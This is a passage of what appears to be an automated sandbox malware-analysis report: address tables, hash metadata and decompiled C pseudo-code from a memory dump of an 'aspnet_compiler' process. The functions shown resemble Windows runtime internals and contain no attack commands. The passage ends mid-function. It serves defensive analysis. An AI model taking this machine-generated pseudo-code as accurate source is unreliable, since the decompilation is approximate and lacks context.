                          0x013f9192
                          0x013f9195
                          0x013f9198
                          0x013f9198
                          0x013f9198
                          0x013f919a
                          0x00000000
                          0x00000000
                          0x0145371f
                          0x01453721
                          0x01453727
                          0x0145372f
                          0x01453733
                          0x01453735
                          0x01453738
                          0x0145373b
                          0x0145373d
                          0x01453740
                          0x00000000
                          0x00000000
                          0x01453746
                          0x01453749
                          0x00000000
                          0x00000000
                          0x0145374f
                          0x01453751
                          0x00000000
                          0x00000000
                          0x01453757
                          0x01453759
                          0x0145375c
                          0x0145375c
                          0x0145375e
                          0x0145375e
                          0x01453761
                          0x01453764
                          0x00000000
                          0x00000000
                          0x01453766
                          0x01453768
                          0x014537a3
                          0x014537a3
                          0x014537a5
                          0x014537a7
                          0x014537ad
                          0x014537b0
                          0x014537b2
                          0x014537bc
                          0x014537c2
                          0x014537c2
                          0x014537b2
                          0x013f9187
                          0x013f9187
                          0x013f918a
                          0x013f918d
                          0x013f918f
                          0x013f9192
                          0x013f9195
                          0x00000000
                          0x013f9195
                          0x00000000
                          0x013f9187
                          0x0145376a
                          0x0145376a
                          0x0145376c
                          0x0145376c
                          0x0145376f
                          0x01453775
                          0x00000000
                          0x00000000
                          0x01453777
                          0x01453779
                          0x00000000
                          0x00000000
                          0x01453782
                          0x01453787
                          0x01453789
                          0x01453790
                          0x01453790
                          0x0145378b
                          0x0145378b
                          0x0145378b
                          0x01453792
                          0x01453795
                          0x01453795
                          0x01453798
                          0x01453798
                          0x0145379b
                          0x0145379b
                          0x013f91a3
                          0x013f91a9
                          0x013f91b0
                          0x013f91b4
                          0x013f91b4
                          0x013f91bb
                          0x013f91c0
                          0x013f91c5
                          0x013f91c7
                          0x014537da
                          0x013f91cd
                          0x013f91cd
                          0x013f91cd
                          0x013f91d2
                          0x013f91d5
                          0x013f9239
                          0x013f9239
                          0x013f91d7
                          0x013f91db
                          0x013f91e1
                          0x013f91e7
                          0x013f91fd
                          0x013f9203
                          0x013f921e
                          0x013f9223
                          0x00000000
                          0x013f9223
                          0x013f9205
                          0x013f9208
                          0x013f920c
                          0x013f9214
                          0x013f9214
                          0x013f91e9
                          0x013f91e9
                          0x013f91ee
                          0x013f91f3
                          0x013f91f3
                          0x013f91f3
                          0x013f91e7
                          0x00000000
                          0x013f91db
                          0x013f9187
                          0x013f9168

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8ea0b5034ccc5919679054df04f3876bd841a8718789c6c2d76f1562a600797e
                          • Instruction ID: a7ccf3d460929a4278461c7b85644e001a13287c8827db6b315f2d1a3554d846
                          • Opcode Fuzzy Hash: 8ea0b5034ccc5919679054df04f3876bd841a8718789c6c2d76f1562a600797e
                          • Instruction Fuzzy Hash: EA31C575A00246DFEB25DF6CC048B9DBBF1BB5835CF14816EE60467362C334A980CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 60%
                          			E01421DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                          				char _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr* _v20;
                          				void* _t22;
                          				char _t23;
                          				void* _t36;
                          				intOrPtr _t42;
                          				intOrPtr _t43;
                          
                          				_v12 = __ecx;
                          				_t43 = 0;
                          				_v20 = __edx;
                          				_t42 =  *__edx;
                          				 *__edx = 0;
                          				_v16 = _t42;
                          				_push( &_v8);
                          				_push(0);
                          				_push(0);
                          				_push(6);
                          				_push(0);
                          				_push(__ecx);
                          				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                          				_push(_t36);
                          				_t22 = E0141F460();
                          				if(_t22 < 0) {
                          					if(_t22 == 0xc0000023) {
                          						goto L1;
                          					}
                          					L3:
                          					return _t43;
                          				}
                          				L1:
                          				_t23 = _v8;
                          				if(_t23 != 0) {
                          					_t38 = _a4;
                          					if(_t23 >  *_a4) {
                          						_t42 = L01414620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                          						if(_t42 == 0) {
                          							goto L3;
                          						}
                          						_t23 = _v8;
                          					}
                          					_push( &_v8);
                          					_push(_t23);
                          					_push(_t42);
                          					_push(6);
                          					_push(_t43);
                          					_push(_v12);
                          					_push(_t36);
                          					if(E0141F460() < 0) {
                          						if(_t42 != 0 && _t42 != _v16) {
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                          						}
                          						goto L3;
                          					}
                          					 *_v20 = _t42;
                          					 *_a4 = _v8;
                          				}
                          				_t43 = 1;
                          				goto L3;
                          			}












                          0x01421dc2
                          0x01421dc5
                          0x01421dc7
                          0x01421dcc
                          0x01421dce
                          0x01421dd6
                          0x01421ddf
                          0x01421de0
                          0x01421de1
                          0x01421de5
                          0x01421de8
                          0x01421def
                          0x01421df0
                          0x01421df6
                          0x01421df7
                          0x01421dfe
                          0x01421e1a
                          0x00000000
                          0x00000000
                          0x01421e0b
                          0x01421e12
                          0x01421e12
                          0x01421e00
                          0x01421e00
                          0x01421e05
                          0x01421e1e
                          0x01421e23
                          0x0146570f
                          0x01465713
                          0x00000000
                          0x00000000
                          0x01465719
                          0x01465719
                          0x01421e2c
                          0x01421e2d
                          0x01421e2e
                          0x01421e2f
                          0x01421e31
                          0x01421e32
                          0x01421e35
                          0x01421e3d
                          0x01465723
                          0x0146573d
                          0x0146573d
                          0x00000000
                          0x01465723
                          0x01421e49
                          0x01421e4e
                          0x01421e4e
                          0x01421e09
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                          • Instruction ID: 89f3c73db2d6aa2f4f31f7f53e514ab05597302157c8b4da47ce24a5fa2a589b
                          • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                          • Instruction Fuzzy Hash: 7321C771600129FFD711CF59CC80E6BBBBDEF95A64F514056E605A7730D634AD41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 53%
                          			E01410050(void* __ecx) {
                          				signed int _v8;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr* _t30;
                          				intOrPtr* _t31;
                          				signed int _t34;
                          				void* _t40;
                          				void* _t41;
                          				signed int _t44;
                          				intOrPtr _t47;
                          				signed int _t58;
                          				void* _t59;
                          				void* _t61;
                          				void* _t62;
                          				signed int _t64;
                          
                          				_push(__ecx);
                          				_v8 =  *0x14ed360 ^ _t64;
                          				_t61 = __ecx;
                          				_t2 = _t61 + 0x20; // 0x20
                          				E01429ED0(_t2, 1, 0);
                          				_t52 =  *(_t61 + 0x8c);
                          				_t4 = _t61 + 0x8c; // 0x8c
                          				_t40 = _t4;
                          				do {
                          					_t44 = _t52;
                          					_t58 = _t52 & 0x00000001;
                          					_t24 = _t44;
                          					asm("lock cmpxchg [ebx], edx");
                          					_t52 = _t44;
                          				} while (_t52 != _t44);
                          				if(_t58 == 0) {
                          					L7:
                          					_pop(_t59);
                          					_pop(_t62);
                          					_pop(_t41);
                          					return E0143B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                          				}
                          				asm("lock xadd [esi], eax");
                          				_t47 =  *[fs:0x18];
                          				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                          				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                          				if(_t30 != 0) {
                          					if( *_t30 == 0) {
                          						goto L4;
                          					}
                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          					L5:
                          					if( *_t31 != 0) {
                          						_t18 = _t61 + 0x78; // 0x78
                          						E014C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                          					}
                          					_t52 =  *(_t61 + 0x5c);
                          					_t11 = _t61 + 0x78; // 0x78
                          					_t34 = E01429702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                          					_t24 = _t34 | 0xffffffff;
                          					asm("lock xadd [esi], eax");
                          					if((_t34 | 0xffffffff) == 0) {
                          						 *0x14eb1e0(_t61);
                          						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                          					}
                          					goto L7;
                          				}
                          				L4:
                          				_t31 = 0x7ffe0386;
                          				goto L5;
                          			}




















                          0x01410055
                          0x0141005d
                          0x01410062
                          0x0141006c
                          0x0141006f
                          0x01410074
                          0x0141007a
                          0x0141007a
                          0x01410080
                          0x01410080
                          0x01410087
                          0x0141008d
                          0x0141008f
                          0x01410093
                          0x01410095
                          0x0141009b
                          0x014100f8
                          0x014100fb
                          0x014100fc
                          0x014100ff
                          0x01410108
                          0x01410108
                          0x014100a2
                          0x014100a6
                          0x014100b3
                          0x014100bc
                          0x014100c5
                          0x014100ca
                          0x0145c01e
                          0x00000000
                          0x00000000
                          0x0145c02d
                          0x014100d5
                          0x014100d9
                          0x0145c03d
                          0x0145c046
                          0x0145c046
                          0x014100df
                          0x014100e2
                          0x014100ea
                          0x014100ef
                          0x014100f2
                          0x014100f6
                          0x01410111
                          0x01410117
                          0x01410117
                          0x00000000
                          0x014100f6
                          0x014100d0
                          0x014100d0
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f368ad3e20dc872982a81365d4d3c99c98ceb4f5c7e7d49f02624b5ed6cba50
                          • Instruction ID: 59fd4a72857d54256c28697fc8257e798b1031db0962de98b24fd3dcb54aaa38
                          • Opcode Fuzzy Hash: 9f368ad3e20dc872982a81365d4d3c99c98ceb4f5c7e7d49f02624b5ed6cba50
                          • Instruction Fuzzy Hash: 9331CE71601B04CFD722CF28D840B97B7E5FF88714F14856EE59A87BA4EB35A841CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E01476C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                          				signed short* _v8;
                          				signed char _v12;
                          				void* _t22;
                          				signed char* _t23;
                          				intOrPtr _t24;
                          				signed short* _t44;
                          				void* _t47;
                          				signed char* _t56;
                          				signed char* _t58;
                          
                          				_t48 = __ecx;
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t44 = __ecx;
                          				_v12 = __edx;
                          				_v8 = __ecx;
                          				_t22 = E01417D50();
                          				_t58 = 0x7ffe0384;
                          				if(_t22 == 0) {
                          					_t23 = 0x7ffe0384;
                          				} else {
                          					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          				}
                          				if( *_t23 != 0) {
                          					_t24 =  *0x14e7b9c; // 0x0
                          					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                          					_t23 = L01414620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                          					_t56 = _t23;
                          					if(_t56 != 0) {
                          						_t56[0x24] = _a4;
                          						_t56[0x28] = _a8;
                          						_t56[6] = 0x1420;
                          						_t56[0x20] = _v12;
                          						_t14 =  &(_t56[0x2c]); // 0x2c
                          						E0143F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                          						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                          						if(E01417D50() != 0) {
                          							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                          						}
                          						_push(_t56);
                          						_push(_t47 - 0x20);
                          						_push(0x402);
                          						_push( *_t58 & 0x000000ff);
                          						E01439AE0();
                          						_t23 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                          					}
                          				}
                          				return _t23;
                          			}












                          0x01476c0a
                          0x01476c0f
                          0x01476c10
                          0x01476c13
                          0x01476c15
                          0x01476c19
                          0x01476c1c
                          0x01476c21
                          0x01476c28
                          0x01476c3a
                          0x01476c2a
                          0x01476c33
                          0x01476c33
                          0x01476c3f
                          0x01476c48
                          0x01476c4d
                          0x01476c60
                          0x01476c65
                          0x01476c69
                          0x01476c73
                          0x01476c79
                          0x01476c7f
                          0x01476c86
                          0x01476c90
                          0x01476c94
                          0x01476ca6
                          0x01476cb2
                          0x01476cbd
                          0x01476cbd
                          0x01476cc3
                          0x01476cc7
                          0x01476ccb
                          0x01476cd0
                          0x01476cd1
                          0x01476ce2
                          0x01476ce2
                          0x01476c69
                          0x01476ced

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38631aa6727b46a94ae463cf3383caab1ea29016268239455b5ff809207926c5
                          • Instruction ID: 5eb24a13ba366101d2dfd7b490845aaf2dc4de065c0e762dfd9ff537157a6b0b
                          • Opcode Fuzzy Hash: 38631aa6727b46a94ae463cf3383caab1ea29016268239455b5ff809207926c5
                          • Instruction Fuzzy Hash: 4B21AD71A00A45AFD711DB6DD840E6AB7B8FF58704F04006AF904C77A1D634ED11CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E014390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                          				intOrPtr* _v0;
                          				void* _v8;
                          				signed int _v12;
                          				intOrPtr _v16;
                          				char _v36;
                          				void* _t38;
                          				intOrPtr _t41;
                          				void* _t44;
                          				signed int _t45;
                          				intOrPtr* _t49;
                          				signed int _t57;
                          				signed int _t58;
                          				intOrPtr* _t59;
                          				void* _t62;
                          				void* _t63;
                          				void* _t65;
                          				void* _t66;
                          				signed int _t69;
                          				intOrPtr* _t70;
                          				void* _t71;
                          				intOrPtr* _t72;
                          				intOrPtr* _t73;
                          				char _t74;
                          
                          				_t65 = __edx;
                          				_t57 = _a4;
                          				_t32 = __ecx;
                          				_v8 = __edx;
                          				_t3 = _t32 + 0x14c; // 0x14c
                          				_t70 = _t3;
                          				_v16 = __ecx;
                          				_t72 =  *_t70;
                          				while(_t72 != _t70) {
                          					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                          						L24:
                          						_t72 =  *_t72;
                          						continue;
                          					}
                          					_t30 = _t72 + 0x10; // 0x10
                          					if(E0144D4F0(_t30, _t65, _t57) == _t57) {
                          						return 0xb7;
                          					}
                          					_t65 = _v8;
                          					goto L24;
                          				}
                          				_t61 = _t57;
                          				_push( &_v12);
                          				_t66 = 0x10;
                          				if(E0142E5E0(_t57, _t66) < 0) {
                          					return 0x216;
                          				}
                          				_t73 = L01414620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                          				if(_t73 == 0) {
                          					_t38 = 0xe;
                          					return _t38;
                          				}
                          				_t9 = _t73 + 0x10; // 0x10
                          				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                          				E0143F3E0(_t9, _v8, _t57);
                          				_t41 =  *_t70;
                          				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                          					_t62 = 3;
                          					asm("int 0x29");
                          					_push(_t62);
                          					_push(_t57);
                          					_push(_t73);
                          					_push(_t70);
                          					_t71 = _t62;
                          					_t74 = 0;
                          					_v36 = 0;
                          					_t63 = E0142A2F0(_t62, _t71, 1, 6,  &_v36);
                          					if(_t63 == 0) {
                          						L20:
                          						_t44 = 0x57;
                          						return _t44;
                          					}
                          					_t45 = _v12;
                          					_t58 = 0x1c;
                          					if(_t45 < _t58) {
                          						goto L20;
                          					}
                          					_t69 = _t45 / _t58;
                          					if(_t69 == 0) {
                          						L19:
                          						return 0xe8;
                          					}
                          					_t59 = _v0;
                          					do {
                          						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                          							goto L18;
                          						}
                          						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                          						 *_t59 = _t49;
                          						if( *_t49 != 0x53445352) {
                          							goto L18;
                          						}
                          						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                          						return 0;
                          						L18:
                          						_t63 = _t63 + 0x1c;
                          						_t74 = _t74 + 1;
                          					} while (_t74 < _t69);
                          					goto L19;
                          				}
                          				 *_t73 = _t41;
                          				 *((intOrPtr*)(_t73 + 4)) = _t70;
                          				 *((intOrPtr*)(_t41 + 4)) = _t73;
                          				 *_t70 = _t73;
                          				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                          				return 0;
                          			}


























                          0x014390af
                          0x014390b8
                          0x014390bb
                          0x014390bf
                          0x014390c2
                          0x014390c2
                          0x014390c8
                          0x014390cb
                          0x014390cd
                          0x014714d7
                          0x014714eb
                          0x014714eb
                          0x00000000
                          0x014714eb
                          0x014714db
                          0x014714e6
                          0x00000000
                          0x014714f2
                          0x014714e8
                          0x00000000
                          0x014714e8
                          0x014390d8
                          0x014390da
                          0x014390dd
                          0x014390e5
                          0x00000000
                          0x01439139
                          0x014390fa
                          0x014390fe
                          0x01439142
                          0x00000000
                          0x01439142
                          0x01439104
                          0x01439107
                          0x0143910b
                          0x01439110
                          0x01439118
                          0x01439147
                          0x01439148
                          0x0143914f
                          0x01439150
                          0x01439151
                          0x01439152
                          0x01439156
                          0x0143915d
                          0x01439160
                          0x01439168
                          0x0143916c
                          0x014391bc
                          0x014391be
                          0x00000000
                          0x014391be
                          0x0143916e
                          0x01439173
                          0x01439176
                          0x00000000
                          0x00000000
                          0x0143917c
                          0x01439180
                          0x014391b5
                          0x00000000
                          0x014391b5
                          0x01439182
                          0x01439185
                          0x01439189
                          0x00000000
                          0x00000000
                          0x0143918e
                          0x01439190
                          0x01439198
                          0x00000000
                          0x00000000
                          0x014391a0
                          0x00000000
                          0x014391ad
                          0x014391ad
                          0x014391b0
                          0x014391b1
                          0x00000000
                          0x01439185
                          0x0143911a
                          0x0143911c
                          0x0143911f
                          0x01439125
                          0x01439127
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                          • Instruction ID: dcc6dd305496df8bf9f4f45a3541b8c94825c0ab1e81ae7039ca6c6d4c697fa7
                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                          • Instruction Fuzzy Hash: 24214171A00205EFEB21DF59C584A9AFBF8EB98754F14887FE985A7220D370AD45CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E01423B7A(void* __ecx) {
                          				signed int _v8;
                          				char _v12;
                          				intOrPtr _v20;
                          				intOrPtr _t17;
                          				intOrPtr _t26;
                          				void* _t35;
                          				void* _t38;
                          				void* _t41;
                          				intOrPtr _t44;
                          
                          				_t17 =  *0x14e84c4; // 0x0
                          				_v12 = 1;
                          				_v8 =  *0x14e84c0 * 0x4c;
                          				_t41 = __ecx;
                          				_t35 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x14e84c0 * 0x4c);
                          				if(_t35 == 0) {
                          					_t44 = 0xc0000017;
                          				} else {
                          					_push( &_v8);
                          					_push(_v8);
                          					_push(_t35);
                          					_push(4);
                          					_push( &_v12);
                          					_push(0x6b);
                          					_t44 = E0143AA90();
                          					_v20 = _t44;
                          					if(_t44 >= 0) {
                          						E0143FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x14e84c0 * 0xc);
                          						_t38 = _t35;
                          						if(_t35 < _v8 + _t35) {
                          							do {
                          								asm("movsd");
                          								asm("movsd");
                          								asm("movsd");
                          								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                          							} while (_t38 < _v8 + _t35);
                          							_t44 = _v20;
                          						}
                          					}
                          					_t26 =  *0x14e84c4; // 0x0
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                          				}
                          				return _t44;
                          			}












                          0x01423b89
                          0x01423b96
                          0x01423ba1
                          0x01423bab
                          0x01423bb5
                          0x01423bb9
                          0x01466298
                          0x01423bbf
                          0x01423bc2
                          0x01423bc3
                          0x01423bc9
                          0x01423bca
                          0x01423bcc
                          0x01423bcd
                          0x01423bd4
                          0x01423bd6
                          0x01423bdb
                          0x01423bea
                          0x01423bf7
                          0x01423bfb
                          0x01423bff
                          0x01423c09
                          0x01423c0a
                          0x01423c0b
                          0x01423c0f
                          0x01423c14
                          0x01423c18
                          0x01423c18
                          0x01423bfb
                          0x01423c1b
                          0x01423c30
                          0x01423c30
                          0x01423c3d

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6799e3fbe4fe246c7f1b69db1f3fdb10d4aea7c246db1a43ad0c84d7fe63aa73
                          • Instruction ID: ba791b3a159b8749bf9c3df2e0052f3ed92bdebd0b132feb6690f9b4f1100bf5
                          • Opcode Fuzzy Hash: 6799e3fbe4fe246c7f1b69db1f3fdb10d4aea7c246db1a43ad0c84d7fe63aa73
                          • Instruction Fuzzy Hash: C721C272A00119AFDB11DF59CE81F6ABBBDFB54308F1501A9E608AB262D375ED41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E01476CF0(void* __edx, intOrPtr _a4, short _a8) {
                          				char _v8;
                          				char _v12;
                          				char _v16;
                          				char _v20;
                          				char _v28;
                          				char _v36;
                          				char _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed char* _t21;
                          				void* _t24;
                          				void* _t36;
                          				void* _t38;
                          				void* _t46;
                          
                          				_push(_t36);
                          				_t46 = __edx;
                          				_v12 = 0;
                          				_v8 = 0;
                          				_v20 = 0;
                          				_v16 = 0;
                          				if(E01417D50() == 0) {
                          					_t21 = 0x7ffe0384;
                          				} else {
                          					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                          				}
                          				if( *_t21 != 0) {
                          					_t21 =  *[fs:0x30];
                          					if((_t21[0x240] & 0x00000004) != 0) {
                          						if(E01417D50() == 0) {
                          							_t21 = 0x7ffe0385;
                          						} else {
                          							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                          						}
                          						if(( *_t21 & 0x00000020) != 0) {
                          							_t56 = _t46;
                          							if(_t46 == 0) {
                          								_t46 = 0x13d5c80;
                          							}
                          							_push(_t46);
                          							_push( &_v12);
                          							_t24 = E0142F6E0(_t36, 0, _t46, _t56);
                          							_push(_a4);
                          							_t38 = _t24;
                          							_push( &_v28);
                          							_t21 = E0142F6E0(_t38, 0, _t46, _t56);
                          							if(_t38 != 0) {
                          								if(_t21 != 0) {
                          									E01477016(_a8, 0, 0, 0,  &_v36,  &_v28);
                          									L01412400( &_v52);
                          								}
                          								_t21 = L01412400( &_v28);
                          							}
                          						}
                          					}
                          				}
                          				return _t21;
                          			}



















                          0x01476cfb
                          0x01476d00
                          0x01476d02
                          0x01476d06
                          0x01476d0a
                          0x01476d0e
                          0x01476d19
                          0x01476d2b
                          0x01476d1b
                          0x01476d24
                          0x01476d24
                          0x01476d33
                          0x01476d39
                          0x01476d46
                          0x01476d4f
                          0x01476d61
                          0x01476d51
                          0x01476d5a
                          0x01476d5a
                          0x01476d69
                          0x01476d6b
                          0x01476d6d
                          0x01476d6f
                          0x01476d6f
                          0x01476d74
                          0x01476d79
                          0x01476d7a
                          0x01476d7f
                          0x01476d82
                          0x01476d88
                          0x01476d89
                          0x01476d90
                          0x01476d94
                          0x01476da7
                          0x01476db1
                          0x01476db1
                          0x01476dbb
                          0x01476dbb
                          0x01476d90
                          0x01476d69
                          0x01476d46
                          0x01476dc6

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 576df13e98082ba23d45f79f54c5ca8bd7aea7ec16f6bac9ebc4d62ef7d8ae6b
                          • Instruction ID: 9ebab08d1185479702562385d15edb98bd3ea96839dfbfe51ec34b295add4ecb
                          • Opcode Fuzzy Hash: 576df13e98082ba23d45f79f54c5ca8bd7aea7ec16f6bac9ebc4d62ef7d8ae6b
                          • Instruction Fuzzy Hash: 91212572400A459FE311DF29C944FABBBEDEFA1640F05046BF940C7271D734C54AC6A2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 67%
                          			E014C070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                          				char _v8;
                          				intOrPtr _v11;
                          				signed int _v12;
                          				intOrPtr _v15;
                          				signed int _v16;
                          				intOrPtr _v28;
                          				void* __ebx;
                          				char* _t32;
                          				signed int* _t38;
                          				signed int _t60;
                          
                          				_t38 = __ecx;
                          				_v16 = __edx;
                          				_t60 = E014C07DF(__ecx, __edx,  &_a4,  &_a8, 2);
                          				if(_t60 != 0) {
                          					_t7 = _t38 + 0x38; // 0x29cd5903
                          					_push( *_t7);
                          					_t9 = _t38 + 0x34; // 0x6adeeb00
                          					_push( *_t9);
                          					_v12 = _a8 << 0xc;
                          					_t11 = _t38 + 4; // 0x5de58b5b
                          					_push(0x4000);
                          					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                          					E014BAFDE( &_v8,  &_v12);
                          					E014C1293(_t38, _v28, _t60);
                          					if(E01417D50() == 0) {
                          						_t32 = 0x7ffe0380;
                          					} else {
                          						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                          					}
                          					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                          						_t21 = _t38 + 0x3c; // 0xc3595e5f
                          						E014B14FB(_t38,  *_t21, _v11, _v15, 0xd);
                          					}
                          				}
                          				return  ~_t60;
                          			}













                          0x014c071b
                          0x014c0724
                          0x014c0734
                          0x014c0738
                          0x014c074b
                          0x014c074b
                          0x014c0753
                          0x014c0753
                          0x014c0759
                          0x014c075d
                          0x014c0774
                          0x014c0779
                          0x014c077d
                          0x014c0789
                          0x014c0795
                          0x014c07a7
                          0x014c0797
                          0x014c07a0
                          0x014c07a0
                          0x014c07af
                          0x014c07c4
                          0x014c07cd
                          0x014c07cd
                          0x014c07af
                          0x014c07dc

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                          • Instruction ID: bcc3e73cc8f6d25573158ef778fac481224dbb406362b173af9116fb868f6f2c
                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                          • Instruction Fuzzy Hash: EA21F53A2042049FD705DF18C890AAABBA5EBE4B50F04856EF9959B3A5D630D909CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E01477794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _t21;
                          				void* _t24;
                          				intOrPtr _t25;
                          				void* _t36;
                          				short _t39;
                          				signed char* _t42;
                          				unsigned int _t46;
                          				void* _t50;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t21 =  *0x14e7b9c; // 0x0
                          				_t46 = _a8;
                          				_v12 = __edx;
                          				_v8 = __ecx;
                          				_t4 = _t46 + 0x2e; // 0x2e
                          				_t36 = _t4;
